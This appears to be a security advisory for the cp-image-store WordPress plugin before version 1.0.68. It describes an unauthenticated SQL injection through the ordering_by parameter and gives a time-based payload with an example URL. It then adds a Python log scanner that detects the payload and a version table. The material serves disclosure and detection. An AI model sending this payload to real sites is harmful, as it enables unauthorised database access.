The plugin does not sanitise and escape the ordering_by query parameter before using it in a SQL statement on pages where the [codepeople-image-store] shortcode is embedded, allowing unauthenticated users to perform an SQL injection attack.
On a page where the [codepeople-image-store] shortcode is embedded, append the following payload: ordering_by=post_author+and+sleep(5), e.g. https://example.com/?cpis_image=test&ordering_by=post_author+and+sleep(5)
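
A log check for the request pattern described above, as an added example that is not part of the original advisory or the plugin's code: it flags requests whose decoded ordering_by value is not a plain identifier. The combined access-log format, the sample lines and the benign value post_title are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A legitimate sort key is a single column-like identifier; anything else
# (spaces, parentheses, operators, quotes) is not a column name.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_ordering_by(log_line, param="ordering_by"):
    """Return decoded values of `param` in one log line that are not plain identifiers."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    # parse_qs decodes %xx escapes and turns '+' into a space, so differently
    # encoded forms of the same value are compared after decoding.
    values = parse_qs(query).get(param, [])
    return [v for v in values if not IDENTIFIER.fullmatch(v)]


def scan(lines):
    """Return (client_ip, value) pairs for every flagged request."""
    hits = []
    for line in lines:
        ip = line.split(" ", 1)[0]
        hits.extend((ip, v) for v in suspicious_ordering_by(line))
    return hits


# Constructed sample log lines (documentation IP ranges, example.com site).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?cpis_image=test&ordering_by=post_title HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?cpis_image=test&ordering_by=post_author+and+sleep(5) HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /?cpis_image=test&ordering_by=post_author%20and%20sleep%285%29 HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tordering_by={value!r}")
```

Hits on sites running a version below 1.0.68 are worth correlating with response times, since the advisory's payload is time-based.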
| CPE | Name | Operator | Version |
|---|---|---|---|
| | cp-image-store | lt | 1.0.68 |